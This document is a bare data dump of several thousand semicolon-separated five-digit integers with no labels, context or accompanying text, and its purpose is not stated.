57071;20420;29651;31893;49060;66842;14405;57157;35901;49269;59844;66401;65150;17230;62976;15901;12204;34767;27911;18221;54646;66841;35491;25725;60274;45695;25237;53535;59760;37507;59817;38949;47324;58452;54627;18537;28790;60803;29836;39519;64775;53763;21648;14837;46034;45553;33687;48452;45858;40625;57466;42772;61025;17385;28765;50839;29723;30548;44579;43785;10124;46921;32604;28661;40699;26481;51933;22136;12717;57568;52379;25915;53960;39346;55748;63829;25898;16990;22186;33826;33909;19795;40523;59186;45334;19150;18776;42530;38424;29972;59174;65972;32838;16320;55745;64973;42960;30323;34908;62036;12766;59694;33065;21069;26019;13056;57673;49218;60246;47226;13294;64512;12850;58812;37049;15051;48241;12641;57079;60384;62666;45287;63407;37973;48533;44869;60644;58125;47551;56146;62087;50729;58993;18161;35766;53450;62426;39794;28805;58075;17035;56620;27667;37013;23523;55115;38582;44152;16949;16429;10812;60475;29309;40617;28147;24975;51041;43759;21644;63684;39205;61759;15333;58083;40954;51954;63128;22975;13538;34705;58471;25764;29277;55304;55245;33606;36777;55856;62107;23302;63256;52828;57867;38656;58770;58887;29260;15754;61963;53458;62892;49806;43631;19752;48629;32166;26719;64858;35560;64460;27679;56825;53041;49684;24138;42378;24663;18840;11191;21184;28546;41300;13802;39394;29753;48744;21086;16586;27219;20577;11072;11668;53633;12900;48213;15070;27183;38566;38087;40057;48621;52448;23101;38687;63618;54594;35871;42873;20303;18010;17546;11221;19840;44046;45466;34865;21857;40264;40083;52068;54893;56849;58091;65457;52359;30776;59596;64289;27547;42594;29098;32884;28321;24063;32781;56747;63400;57991;17783;41630;35048;20963;63049;28126;54974;25301;27900;45186;61788;63817;40738;20837;46539;51719;31643;19634;62025;32223;43081;39876;47865;58060;57415;52870;10134;24119;26375;31556;18074;60106;46648;22158;16917;19551;10378;19134;44585;59181;26487;40085;53620;26282;31512;62636;36570;58008;29894;17357;44785;21788;14432;20922;30055;30556;58968;15679;50512;11078;50347;33890;66167;40634;44552;35450;54631;20276;30483;55076;34199;25399;57888;16080;53711;49491;29774;18292;48962;36469;17590;59812;64537;29282;34578;52302;42574;45597;49387;28975;36431;25994;28632;18811;55526;32252;45671;65539;53806;60513;22278;39941;27155;40985;63355;38352;34184;41588;61059;19831;45194;66426;22131;52795;59426;18915;35697;24414;23117;65867;39026;44929;50101;15640;57815;58869;12609;21299;24332;12375;29068;22025;31174;49764;15982;14012;45441;34429;46510;26588;25039;20398;61624;34761;62957;24450;42347;30828;13485;10318;20782;35463;59088;54793;16261;10128;18278;64041;49139;47080;22858;11463;62031;41489;25703;38381;33951;13512;59097;13284;14375;19708;40455;64569;41402;15259;13395;26488;47756;16868;33104;50906;33808;57571;14466;13381;23922;55066;31805;53747;64203;42352;18792;14972;21398;63784;19000;45623;46230;59084;22270;62561;63028;63314;60375;39720;55498;44349;39653;42404;44010;29466;11790;20942;37100;27775;37186;14559;34380;24993;61478;19169;14704;25070;37405;38605;53592;11282;59525;24190;58152;21778;50657;62820;38622;17644;20588;34307;58435;49039;49439;13668;23662;23713;58349;52942;36183;27852;65058;59503;49267;59790;50716;15471;63956;48380;39426;42510;56417;17110;25949;32892;53393;41685;27645;25839;65862;20459;11089;21896;51785;27022;17726;59692;33893;35580;38476;27253;52472;30033;56470;40883;34817;21137;58486;55927;50286;66038;49203;26602;20022;45007;20759;46977;34323;18425;62284;34436;58609;13113;18472;10589;55817;33088;27172;44529;11853;63527;40927;13713;43436;12905;62556;62551;14276;64719;22048;55339;37774;34792;16298;28351;55514;17257;18904;22303;13935;35745;36563;61838;44960;54571;22821;17226;28040;60482;23568;30958;23641;53545;59847;43198;21224;28183;52082;17361;63105;61023;64501;19977;27907;22036;64816;11690;45132;44510;34977;46619;22249;11643;46185;64984;26445;40565;15469;50285;21528;16943;24902;14504;58504;16255;40140;30971;58724;27602;51659;27715;28557;54681;66846;18347;39562;53103;23968;60915;25465;36262;50111;19991;11311;36200;51555;34807;15462;12616;43708;43363;63046;35993;39837;58586;11188;60131;48743;15887;62320;27280;45280;14688;14345;16346;40522;39797;66364;20711;27382;38425;39744;55979;10746;37390;64715;14226;13534;59139;11271;33987;19768;38880;18927;20433;62444;32356;61631;31691;16888;12537;52337;30706;64403;35453;55508;65353;27013;58423;63191;14055;10160;49186;54779;50542;35286;55188;44399;49420;19184;45224;25154;26794;37860;24218;34203;62651;41404;42486;54666;15044;10671;61625;29317;63136;15599;25245;12396;22614;42029;59767;46434;59416;55920;27536;44815;53136;46685;24443;24100;35468;25027;34747;16543;33956;30075;20780;62459;58412;45759;64143;22562;33191;55595;47252;11820;23363;25106;35608;32056;12548;38474;57733;66015;61634;28056;56275;54755;62224;22797;51006;11929;31841;29436;61840;32355;35345;11595;42255;41725;14125;46076;55627;36525;29157;12040;41531;45037;35511;17291;45574;52926;59658;24951;40972;30282;54710;61262;39436;14201;32346;64761;46232;41532;64749;50565;64169;19034;31604;22029;23061;57150;63801;24621;25829;49626;28138;25333;21791;41146;19359;60796;44752;66645;21692;12956;54747;64589;32773;45289;24986;54108;12638;39679;12772;10145;65096;54380;31767;22356;62438;61544;38751;44177;32190;65866;27215;27722;48958;47140;33847;37921;14735;37351;14655;41908;22662;61048;24248;34054;30880;23779;50810;62660;34220;31905;55067;60962;25028;53480;56827;16118;21646;47797;60926;39975;43366;53609;39190;17667;66086;36414;29696;21238;13367;18535;11709;33768;31560;12924;39892;51745;51709;22506;28155;55658;65791;63045;52324;12245;24004;31574;25690;45424;25561;37647;10012;31282;43624;38340;44985;46867;25753;14311;42396;14465;46933;18027;25644;22636;10430;17540;56611;17507;42258;34194;48382;37898;41299;41575;60241;51055;11829;45375;62168;38908;40163;62112;58985;66261;31580;29254;66296;24651;38332;14356;22665;39078;53122;40648;61259;45830;46425;13972;14087;53343;32446;63460;20581;16325;22486;15327;39970;39896;20798;17832;20046;63597;18835;12856;45732;50858;25770;30591;52188;46347;17118;51212;55441;33611;41721;26062;59168;54090;10894;10130;44426;16571;32832;12313;38386;22683;46698;62189;51704;55011;10886;28003;23677;56490;34398;33044;31948;10601;23527;62687;61858;47427;34970;13734;61420;33255;60853;43921;30672;46019;43655;64564;24711;34544;23236;49931;58987;57531;25318;28488;58610;15525;64517;56077;56182;10248;54509;48321;39588;51692;54801;45366;41940;17450;56231;51675;33588;29673;40006;52779;51400;35808;66370;33099;15283;21984;30914;59091;18558;26511;37365;21507;32023;63030;51515;40329;13914;62340;13580;44809;59184;29648;25668;31655;41054;56730;37150;59142;56736;11256;33644;54864;60621;47257;36603;15398;48477;50059;50644;16662;40882;15791;37082;42869;61414;19501;61470;40652;51213;52062;30702;38857;28940;62991;21134;24481;37623;11244;41072;23115;11992;43388;31642;27823;37421;46178;12419;44375;34329;18351;46130;35469;59545;15995;36367;55900;64442;39467;36461;61884;33388;16362;53077;43731;15395;49966;15367;35663;13594;18432;56128;41862;44237;61314;48486;64358;36573;14964;41636;33977;18267;44786;21785;19058;47173;57739;29471;16204;32728;39361;65167;35374;42777;65141;27527;65016;10684;12800;46956;47748;21943;15914;11813;16606;44241;22140;61836;35525;35992;20097;34106;57811;21092;47607;15425;11153;55814;28676;14051;10581;42241;20477;42711;58175;56244;21775;49752;59419;48751;15413;29378;18135;38996;62313;58269;26360;10702;11688;44219;20936;43656;54491;60111;56157;54293;15538;19405;38238;19897;47001;20247;21423;60154;36161;55521;14468;51690;21286;57509;30553;56245;39227;43293;26005;59598;43070;47046;17421;11873;32877;49691;44971;55983;59968;15094;29051;21660;63709;12112;30325;56989;47259;50559;51584;20389;66529;61437;12668;40728;53327;41441;31010;54484;44791;58613;25937;14824;61902;40278;37019;32251;55220;26475;19970;18029;46596;47113;47419;59623;28666;39371;65450;21351;34510;38652;23717;41902;46898;51060;29342;38895;50630;33052;42135;13582;63903;24268;15461;46395;50289;42193;40833;55316;44192;57905;48215;66030;55255;48936;28754;12437;62451;22189;35495;55993;52611;37953;15245;41275;59098;27761;14875;24269;42534;61545;56330;51908;66468;41359;61771;28688;62079;47162;32417;60262;24865;56053;31409;57313;51187;35565;53045;66168;54234;53311;56794;56277;38619;37384;50514;47422;50612;31369;45828;56276;54328;66416;37116;18864;36443;18391;13292;48966;46439;19175;57761;23663;49723;23947;47320;43470;54256;51644;59067;21599;16666;40153;64339;55592;63251;33911;18485;65165;65805;15489;29165;39985;31090;12612;26529;41894;28675;45798;22079;34842;65623;57045;46711;27724;55307;53721;54616;31374;35234;45978;28643;65955;62867;61485;50163;38783;54727;23552;23423;55009;31956;66180;58872;17828;61114;53117;57408;64315;60669;40787;47654;44699;14899;58229;41482;65653;26254;16627;40962;14948;38420;10677;53540;41826;27896;11280;42573;34295;23197;15834;34303;49401;49007;49682;44039;58118;56942;31125;34847;62749;19638;43704;24803;64160;21843;25417;57997;26922;45824;22948;47589;61309;51715;47134;13530;55410;23832;54507;27557;16088;13709;53314;10893;30313;47150;20329;47585;41764;60401;52956;38384;50030;57508;17539;41465;61920;34607;11748;60838;16257;29690;36586;43445;52238;20978;43035;66595;44619;29564;62894;20194;37157;62589;38963;41975;58339;11994;19223;35315;43297;16165;13793;40536;14004;50026;20988;23084;41425;42276;42926;33844;31309;35078;35007;20608;14632;19187;59774;16601;28850;15089;55347;19529;35102;63227;46748;46527;62310;42825;57738;26329;62302;22400;29019;14692;34356;58213;44770;35051;17433;23551;11923;31441;66484;46146;36136;61506;12669;26912;14361;51685;18032;46118;12412;14290;66855;13655;16049;37350;30519;46833;27932;11434;41984;60198;27000;43256;55540;34503;50472;21592;16841;33134;46182;16977;21756;30976;51392;16321;52105;19368;64837;24145;49649;26574;34599;65924;48987;66788;17262;29400;46394;38678;37725;64921;52998;44581;29845;44067;36409;17304;18489;46613;11076;11285;15371;25719;14886;14753;34805;27692;35857;46603;35729;50819;58097;41212;38088;31667;28605;52644;59738;18615;12285;19374;49978;21499;28579;65256;40095;65833;19383;34457;61284;51872;11178;20058;55668;12056;51734;66469;18774;15415;59860;51722;56715;11374;43832;48293;60316;66773;33379;43938;15992;63567;10449;53661;27503;63322;60528;49558;22108;15681;28428;65432;36602;17500;55533;32270;53073;40858;49963;60103;47306;37629;52502;33894;32565;16755;46871;57587;13507;33415;38240;46732;27740;16142;56291;38905;18859;53364;50633;28189;53010;23896;56770;30000;65832;14113;42181;10034;37218;53532;44368;12606;37862;37866;32540;50888;59712;58657;44345;18126;28270;65949;26130;41204;51090;19576;37876;15173;39960;22360;41626;54149;58481;39857;26369;36914;49722;42313;53867;18960;53018;45989;52810;61612;46239;39149;53467;63754;22658;49953;27519;40806;15737;57910;61915;46788;24441;27246;34827;50025;42961;45959;43364;38037;17483;22944;23636;29177;27681;46397;63511;63609;58475;20820;47692;33920;40558;29030;26509;14826;45325;24584;64757;52660;14298;19443;15532;64676;52312;36897;29077;57082;11704;22654;11600;10856;15503;24771;15813;25061;14255;66186;60831;41851;37761;66631;48912;48402;31066;28633;49627;28088;65443;18673;17217;45301;34866;56717;33538;39054;21064;23875;53222;48166;39677;39982;46621;51833;15300;49419;14859;45095;41085;32189;48162;12224;62114;47702;13141;61244;25758;47764;17538;44277;19044;24681;16059;34700;53962;42837;45575;58150;52701;15473;43270;11013;33110;40363;24088;32293;14803;35662;43308;28804;66127;18008;66499;55929;18352;37354;14633;57630;15682;49551;49064;16265;40201;59675;30957;24151;12546;57320;42933;22241;40229;45697;44861;15909;62410;49059;44173;14461;27617;22462;46918;38127;21074;16932;31621;40507;21473;11745;40324;26755;11850;31795;57385;49696;57886;59083;61080;61105;21004;18519;66107;64121;17369;21669;56651;43426;37165;27425;46743;17052;15345;31877;49295;11868;17551;55732;61955;19258;34803;61225;31187;66511;25824;52646;13157;49178;16361;16764;31421;46675;21010;17078;26311;39625;40948;17055;18219;46746;17624;48994;66604;62992;66229;58405;31864;13720;24210;24380;34642;15861;64631;51701;40666;27228;39702;40563;56200;25217;47022;30102;43275;19237;63151;37425;20157;43112;48200;64284;42687;24887;46744;15436;28788;52185;31709;61274;21585;17082;63487;49791;28146;17660;66026;56729;48877;35112;10314;10418;41517;57643;61028;19944;47116;39750;31099;52385;65176;62765;56663;22483;36141;27890;12685;35392;30044;41136;63337;66725;30581;60078;19215;59584;65675;33690;14317;25270;27629;20069;24382;41302;40015;20892;49550;64454;53278;25447;37618;29590;57974;11545;38248;35963;25084;11735;18501;52399;14088;41386;15037;45936;44121;23413;62466;57680;59613;20353;39063;31092;49887;62955;27634;40415;46962;35924;37826;25435;32004;25606;24205;39756;63261;18817;55686;41406;50133;37770;50071;29748;34015;13698;13864;46587;25031;31896;51883;45995;63759;15773;61477;59085;44389;58406;15996;61815;29299;37529;56510;19651;64049;17735;37323;14984;62698;19596;11298;62735;46580;44032;29441;61570;50262;32457;48624;13029;27537;39851;40401;22800;31855;38391;13784;53407;13691;43391;56918;20093;49351;23711;14384;49527;10735;35646;26979;37356;64513;62989;45219;37409;17801;45645;31448;12873;59149;19587;17708;54588;14761;56205;43845;54791;62812;57816;46405;17430;46466;16639;33495;29498;24395;13438;47205;25737;33907;23447;41767;15431;59684;35287;61405;38985;14832;32843;49171;14977;13276;14350;61407;18056;59488;18153;53014;16238;65337;41104;33648;60277;50065;30988;21907;33086;60191;44038;46990;29115;23892;10164;28210;11736;33811;46964;64182;32686;29607;59050;28143;55926;32664;33845;59221;47509;35726;66722;13895;20612;10452;40467;37161;26539;54028;18884;60950;48267;56886;18990;66442;21245;27384;45526;32969;27627;38618;38538;58401;26531;51736;42505;36119;42656;38016;13136;17476;17482;37215;56573;14719;29463;15468;55941;15763;47047;54758;57633;17199;30188;40072;48443;37751;11475;21967;21675;26064;32173;23497;58915;65342;29038;42855;25721;34382;32753;35300;60755;53901;37674;45202;33011;33857;30992;22767;42562;56676;31272;27858;30124;42839;17310;26737;16425;25370;53693;13612;31495;35230;40195;50316;45017;42174;29314;58663;40693;24397;33895;15218;41361;21710;47618;32277;30240;60898;56282;34230;35421;12787;23993;20419;24581;59543;11540;32711;49830;49327;10158;42382;57809;61229;17400;26355;38354;18544;40903;43660;23454;59189;39665;19815;16456;31459;50567;56338;56310;23141;50525;53849;13014;27440;27790;42273;19913;11635;45950;45955;16587;35666;51442;65212;44544;39916;56936;41262;57167;60197;37765;13540;15388;25797;33668;47164;26933;24604;53001;58701;54070;23871;35861;65868;51061;20168;53742;28784;57691;29083;42013;64557;34987;20178;53049;46015;41423;45381;36348;56689;50757;15761;63197;13455;21871;34822;62211;40027;37734;61896;23036;11672;18542;18878;47777;33414;38343;30052;27371;55749;38487;22727;54056;56836;62891;11732;59196;34768;13618;48313;60624;59600;21451;65446;14554;45071;17490;61113;65733;54517;34968;16585;65861;47310;30860;59823;30946;20014;60930;48502;37607;62201;50203;21839;37711;30358;26101;32260;34864;19517;51668;66201;63601;36866;42460;56927;27204;11817;52347;38322;66291;22617;29600;62387;20262;32250;12551;32246;25982;50731;42042;37841;13245;14078;44911;41265;32484;62427;41678;44117;16245;63287;57491;14659;54873;42412;23187;28990;63845;46099;18654;47586;35838;49069;28159;41701;50852;40940;25043;58920;52967;27986;53844;12428;10374;60240;45438;49222;26552;42973;41078;30526;11818;66011;18395;30264;16817;13315;44489;65335;34212;46688;10836;27005;54158;55150;56775;25917;13298;19968;52846;16045;49441;31087;61811;35326;64466;52752;64718;50558;55031;57548;33960;36493;46129;26277;42586;51261;51556;13241;26249;54140;35996;31701;59740;56817;28529;32666;22420;62480;20667;60531;20703;44015;27322;25981;14250;62290;16185;34741;29364;19994;12122;26199;22555;20472;66932;57193;55371;28519;56735;64234;29963;24206;25165;24842;38260;25659;62856;12618;60689;65476;27739;58785;45070;38722;47767;34048;57025;31408;48635;13826;47175;32819;14252;13321;25600;35280;33093;60050;42559;44914;12298;42745;54994;39102;21425;40718;48648;63037;60547;49949;60781;66254;27784;54187;50556;18894;13920;11655;62786;22931;21689;64245;58799;51529;65913;66005;65306;13281;54355;50309;52720;12919;13995;26787;35186;58230;30954;21221;43031;45876;45867;10921;26112;24704;66861;64080;33630;57800;66175;19561;25776;19274;10756;33793;29252;18488;35667;25093;37147;48897;34346;36432;44410;48429;58232;10317;52450;56486;57646;64938;56099;50282;63873;63276;65482;29663;42620;54664;51731;64332;37813;36939;18946;52910;15142;28803;27308;27505;62303;38958;40680;26538;37113;40477;25424;58996;25621;52070;42443;24856;52927;54674;51490;53325;33269;61021;33517;49750;23726;44108;56833;16179;63734;40347;53919;65315;62599;33592;11656;15351;65356;16939;52696;48264;62001;22590;20246;17474;29870;58600;16972;47366;27188;19136;35437;42105;44148;34365;30720;41137;66808;25191;13791;51508;42043;28481;46181;23291;31523;29231;11792;51292;50811;55349;29738;21481;12987;16344;11305;52601;43428;20271;17276;33523;51426;13616;11891;35092;37060;18286;59486;44231;27844;14530;19049;11777;28599;64353;51941;62271;21463;52539;39340;35884;50146;58534;18154;35544;54410;15481;54124;28691;21300;42049;23120;34616;11246;39206;43850;28899;64081;25509;22984;61497;35512;15359;53385;62715;26093;56596;60587;44593;64381;16472;29954;42484;46992;39589;30577;51241;40626;12681;10668;45920;39567;47194;17169;11717;10262;36580;31839;44961;21602;55461;37966;56821;37766;59220;43718;17979;65097;28291;64411;22936;35967;62311;23003;55750;65998;59980;66818;64916;46955;29761;41009;39842;18632;65606;42434;32754;63981;30157;46363;40640;51298;63631;66571;21796;24714;57333;47790;50804;54004;24599;12721;43121;40024;17208;31433;55671;14639;12456;66534;64132;20699;26923;29824;39073;19881;49552;29717;57930;57383;40267;16596;16108;35147;10151;58963;63202;41154;10193;34035;44834;54810;16833;24253;56149;31407;35088;10375;38543;12709;36987;22877;61106;26349;36087;36664;48943;53284;55986;14900;41641;44104;42517;48591;19673;51711;45392;58371;47341;28620;33306;65388;11147;55486;51583;11234;42958;59942;63901;29619;18123;16235;25214;39165;56090;58314;54470;33908;49840;48540;21553;56196;59753;63968;63248;62665;32019;66803;42606;35063;19508;62517;36916;55938;33007;32895;65463;19912;44279;49424;43526;53155;42688;64539;40173;18662;29440;64057;40628;20532;10820;35386;19603;22538;28524;56268;27413;41267;27745;55962;63851;29993;16583;35438;23611;35080;31442;55083;25054;56110;55985;11833;33638;30098;45410;44229;51062;28943;29695;19816;45093;19719;17176;25391;12322;29507;24529;64792;21548;17432;17517;59199;43015;53131;31201;61835;57501;40246;47579;43274;36726;24634;12592;37741;22275;19578;38607;22886;44138;65507;55569;17812;21535;16340;44999;45974;32017;35987;44303;32882;66343;37955;52474;25873;49172;45886;30514;64974;29750;60311;27780;39675;31274;63293;62781;60667;26941;55049;51504;43174;42489;18524;26990;55182;38887;14754;36416;31136;35295;21424;54492;30840;18743;34095;43615;57081;30144;48729;48393;35673;62072;24750;16446;40166;66531;49192;31749;39312;24267;45122;32902;63613;26283;61708;33315;35794;40099;10586;19084;12879;40769;45142;12817;30938;47429;14042;61356;14126;64488;32303;16014;55558;56841;27366;43384;36050;58050;45113;24972;40845;57975;39805;45534;21735;14621;41643;46008;48310;50684;41546;46862;32602;58782;48239;32097;26326;61289;50785;42603;66765;19040;42047;48214;45333;36800;23268;44664;36076;26822;35643;10006;29078;23416;16217;64348;41042;59438;29585;47271;10808;22897;30624;19521;16044;60483;43937;15809;40542;32411;35014;24173;14558;58005;51391;63170;62331;31217;50210;24815;11633;32922;10818;24042;19754;41312;29390;34333;13466;11295;34860;11060;32996;27040;59158;60679;59807;33994;60376;50642;24496;23131;44526;49795;12216;64671;39009;65723;41896;48262;44884;58195;33005;48974;23226;50992;42816;61964;34764;24353;54077;59657;38207;35886;32583;26775;18959;61336;21275;26292;34862;65179;48741;28310;59326;33725;53664;30816;30380;20212;65821;31872;17622;60218;17197;63580;49410;41437;56745;47014;35657;59421;66906;46064;15623;63572;40720;16276;30850;24743;52384;21135;45295;63417;37887;58463;62235;25083;24326;21241;21578;18900;44641;33040;61442;16335;62921;46786;11029;32584;46287;28847;59322;66679;18230;36354;31688;48856;49802;58508;10618;10899;34021;39171;65236;64101;44155;21768;46835;61543;49836;54133;56474;55794;18103;38943;25408;32724;48617;27417;31759;58560;11670;62010;45238;59195;39757;57270;22236;40450;52273;22265;23170;31992;22719;20169;33773;19640;28687;18937;48208;13217;55984;51194;35629;44927;31942;42708;62661;24863;52621;43187;30867;35758;21021;23440;49699;25684;10054;46121;32167;62267;30818;58313;52307;36994;60687;42433;58359;15043;49217;17464;43393;13156;27969;11597;54601;54676;40062;24933;65487;16052;38686;47256;17266;32878;66762;51669;46125;29366;54199;39488;23703;66224;16921;40398;41873;11881;38634;57700;23936;54084;43305;29578;30061;25373;44036;66682;25761;32466;47889;11080;14690;20336;38601;34902;13228;10116;20139;61533;36067;58646;57935;15440;15165;29263;28009;10592;10416;38283;52162;54685;34515;45027;45711;40020;55988;27651;16854;30619;22000;25242;35214;40644;51873;26129;23490;37763;65012;27377;35509;20460;36899;25176;31753;58837;23748;45358;26067;22066;23507;36743;17398;11363;28728;35490;50932;51415;52564;48983;57296;32796;18967;64277;55812;45196;62067;42651;43782;58014;22441;21808;11665;25625;64649;22985;32427;38419;14736;10861;21840;11401;12884;38080;30718;42731;38685;40441;58502;11566;26209;25119;26819;31663;62171;18824;65762;55226;36191;40383;63862;28436;19888;51327;32127;36025;33917;15452;63823;11876;28362;41644;13506;48798;38035;66121;21836;64405;32232;64117;40104;13942;26910;23916;32929;28607;41583;53147;53612;22478;47533;28513;37520;21531;22958;10061;14995;53451;57489;34102;45901;58297;32828;36165;25461;49882;58007;15542;57100;45340;40184;42934;18373;63390;46767;37240;65219;45701;63706;23737;66354;16151;32771;32084;54085;40880;51059;24756;25585;43606;12992;20571;56381;13147;26913;21673;36708;34036;13080;40650;55610;51066;26500;35427;37958;14908;33292;50397;65524;61769;36889;23066;42521;60944;44859;23773;21172;60787;30083;24515;46337;19145;12719;55551;63052;59914;26163;53530;42119;31275;59700;32227;62472;59150;65942;63010;45997;62336;17764;61117;47736;33437;29397;39547;10867;57936;25718;57238;61935;31808;25120;40995;55388;57956;52455;10991;48525;40740;39978;53462;10239;40473;39267;21521;33125;25444;44990;66497;41362;10519;61573;21272;39042;27552;31483;46661;52990;13631;23680;10038;41628;14563;25881;47311;23282;32493;53659;11834;61752;61541;29148;66941;45873;11995;59496;61377;57028;25799;58281;66628;25591;34011;37527;48343;27404;63890;13977;53688;11238;36104;12128;23719;35919;66540;22737;66098;37154;26627;21400;44713;33270;56776;50288;55772;66876;18291;26455;45610;28957;18665;36911;30922;43455;64728;58994;23437;50667;33632;28686;54842;39459;26995;62228;52722;43487;28740;15975;63626;37030;39088;52756;11706;52938;55119;32881;25866;44805;37630;13411;31967;58392;56234;11313;10046;12304;58364;34628;42359;44877;25512;40106;22939;57121;22334;50033;14708;20696;61665;20905;26290;62723;41248;34198;24931;36931;50711;32437;49256;58700;66342;58386;37227;43113;49656;21560;45117;25521;22773;47138;11050;54382;63472;11426;28239;41650;38154;13987;17748;50991;54553;32848;21532;23274;59331;56648;61269;59590;13159;13250;58385;22827;40271;22357;13731;51264;18602;60267;10279;50254;47804;65970;54396;22206;29185;11452;53048;22163;12077;14260;26917;18582;12729;17570;43554;39807;43590;29890;13125;12315;24105;31016;10540;53326;34370;65729;62725;21252;37039;60505;59053;60339;23094;36016;36533;40956;23794;55231;47565;17477;44730;51846;31021;21139;23600;39480;34986;58902;45566;20744;45887;23763;27062;55194;17008;16713;58369;61215;34939;65585;35360;28592;19330;31736;49880;58124;66489;18202;41620;38537;59802;22531;50045;45668;51230;29790;10267;31599;54858;14056;43717;65230;57282;17302;10975;11301;49428;39840;62008;27265;55204;24826;44665;11409;58287;24289;37265;34931;42413;52727;60885;52187;36492;42272;23185;35843;10472;37985;12917;45782;54555;39341;48411;14357;26407;38658;23982;38719;35236;20682;61621;15539;30119;23347;53137;59180;22094;14876;54022;54539;16518;10067;64359;27271;49749;30544;47583;19810;44330;48970;43055;32039;21386;52821;62073;58338;29270;61345;31298;29131;46687;54453;57321;54294;14289;65834;33121;60634;32213;30861;16493;16466;41168;25590;26876;36729;30741;32202;56958;23011;45714;63837;39220;57836;12113;41935;31315;61590;29848;24215;62959;41967;62180;12215;10799;19159;36785;30129;33972;19974;63789;44710;55239;54219;39530;60043;13264;21500;25944;63569;64230;44030;43859;25179;37261;42262;25653;55420;61168;37192;26799;60455;47519;60897;63699;13410;63497;29721;20957;63756;44763;65006;22305;63751;32430;23602;13062;65292;23050;49450;34125;54302;43409;13573;27141;57524;30708;55529;43895;38965;32714;44840;45815;13389;45377;57869;14973;27946;49645;36381;18307;56953;56580;15407;19844;61853;22317;23665;36682;30149;42823;17526;37697;10162;53219;13342;21645;46450;21687;20249;63893;56266;51249;12108;58044;38174;52837;40417;53484;29526;35362;53995;24500;49505;53710;30270;52858;21952;32311;57866;43306;58379;47814;43401;41991;62326;49571;33246;35347;59691;64052;39898;53275;44856;34059;39583;42452;51358;50639;11115;21662;59579;12996;49241;23712;35865;44196;13673;24600;29382;41879;29771;51590;20648;27445;58910;37945;56797;54024;63456;22386;60722;29433;23706;19505;36543;22180;39714;31270;32442;47044;48294;25162;14321;25660;16030;15140;59341;35559;65135;23686;13362;41741;25993;23212;27399;26245;22355;46482;40056;65416;37846;13950;66286;21285;34352;41220;22133;30060;60144;30683;50687;14043;25459;38450;62386;31285;26220;62160;37078;37254;55262;16001;65890;19133;64639;20360;37873;49046;64555;35109;20733;61153;36792;60427;52113;60674;27764;48390;28154;51130;55425;31127;29286;30779;42425;16699;34678;15683;54861;24487;42669;51703;65106;15632;62677;35974;39651;29401;45297;43192;54761;42619;34242;43254;24444;30178;34925;14562;48184;17081;45773;66325;11436;47663;38993;50223;27955;62409;66634;33212;30085;51747;39303;21919;16641;31014;11553;65346;14034;14771;66578;52666;50016;53539;46653;66708;30687;44359;42737;22297;49237;27037;55003;65783;26395;20567;27571;17237;34634;10649;47201;52952;64714;38683;59230;28187;26584;65704;52233;21267;38644;29728;42658;28251;59924;64636;38827;49867;25463;20061;41573;63082;33729;22138;48175;28256;62169;18795;19377;64463;32951;26970;59226;61945;59409;50967;59935;43382;51559;13647;45893;35700;19947;54655;63599;39170;28215;28265;23899;24846;64565;55553;59852;45084;49837;29036;38649;59899;62468;38824;39511;19929;56055;22702;38892;32304;28709;39813;24330;38796;52565;66192;11294;43738;28837;17509;54832;23177;41943;17592;32481;25064;33455;34305;59895;10900;56633;20196;64220;39872;37540;30479;64621;12026;16146;55097;53729;38614;34061;58825;11390;14019;37367;63409;12691;66231;11195;56824;16570;59121;52202;34248;10680;60249;37137;37564;57955;28925;42754;40282;55181;64295;10285;29133;63130;34951;54229;31331;61275;17456;58695;28367;16738;46771;37920;25610;47233;55505;49890;33682;54214;55694;65577;36545;24948;36044;58675;35755;34456;22119;34713;58049;47181;35571;42358;25870;31573;42866;14038;47524;35064;26305;13261;18258;63179;62307;59776;40009;43098;17602;24171;66430;32195;48275;36436;17194;29346;44937;65790;25071;30918;56396;60312;12497;13749;35834;35746;57625;24157;36120;35294;49776;41642;35084;66084;65732;55777;35493;34428;44844;48876;31912;21868;59210;22805;40400;59481;14470;17620;30686;49234;59309;24816;33069;35219;45442;64983;54384;28341;62899;59145;56864;31687;60672;33318;32331;50198;63858;33723;35664;16988;16926;32736;27467;17328;62706;50375;61978;31418;64063;22324;42625;47903;47569;61755;31430;32357;24126;33766;56919;30864;53604;60894;34780;21947;25457;14501;31118;29459;31764;30093;59529;21253;52182;41412;47511;37208;27016;52524;50628;23983;53874;17344;65611;60127;17362;49446;62592;35130;29320;56141;53624;39808;55729;29770;15213;39638;58394;48463;44390;30445;58923;61925;44885;36559;48724;27396;15717;56251;46079;56865;60913;42036;15766;21146;24982;52594;33804;25192;41315;39416;15998;62982;53493;41356;65717;20121;59061;13816;15150;14684;22057;22033;23557;52365;27731;31132;18490;41276;56333;35874;20243;23563;35190;62009;64827;42021;45825;34993;57985;11101;27108;42159;59611;20018;47518;14746;37710;44409;25117;42302;49832;43024;59273;59484;42583;44143;47237;33381;61786;33302;20281;41287;48536;20203;11464;39261;14476;50067;32551;49091;34740;14701;33397;40143;16913;42748;51154;27791;28253;52431;20266;43607;34845;39587;35303;43593;12938;20270;39364;37749;66078;39855;45501;24000;40126;38358;40646;48196;19721;40479;40861;65144;18084;56560;50834;65433;14836;42697;38032;38673;47236;65321;19919;14083;33017;59348;51376;35926;53840;43527;54388;23146;64606;41627;34812;16326;51768;33625;33825;47445;62448;13798;42345;20086;62167;36327;61943;49103;62123;13807;46381;42108;39256;53854;25023;52256;66066;55550;40408;18987;56131;24213;18227;42008;21306;41426;57467;28572;45546;37575;33217;13387;16027;39045;66276;51308;31594;41269;29899;56075;61354;15648;20134;56261;31425;43626;55155;11874;20309;10137;10357;59595;62314;13962;22311;34824;61362;50673;20755;46198;11389;43153;50467;49363;24220;45331;31549;26365;57520;22322;19063;40982;47038;20841;20469;60790;50330;51393;51999;18127;31147;23159;51566;40310;39532;34579;38717;13578;61917;43918;12311;13388;36052;15944;14296;23112;39817;35516;18417;64644;11010;55298;53891;15023;17491;46213;64961;24401;11700;29279;50290;45204;56627;61472;29917;57801;29437;33915;33089;18796;24936;10364;38517;22092;46410;41570;43348;37859;63490;31581;33867;27608;45916;19656;31171;53249;42132;16934;37187;38244;42663;12898;57580;38847;60620;63187;49356;46302;36447;58395;52848;45449;17192;54520;32137;60988;33183;60428;35846;42336;26997;25735;58168;12752;35546;63519;48185;13919;65489;19990;41526;66461;48144;18600;45545;18834;26275;34718;19983;11356;35117;58884;26494;16769;14721;35833;30809;43497;26605;49824;34097;25788;12866;48487;46014;46320;45550;59021;31048;59294;51502;24968;13929;60810;29877;46131;31046;62117;26772;57203;12470;43014;27254;15316;55216;42212;12976;65276;23152;44011;49957;56340;17018;56376;37264;32512;14116;13187;56603;21639;32428;32028;18522;23666;49976;40609;57302;43729;60431;62828;18973;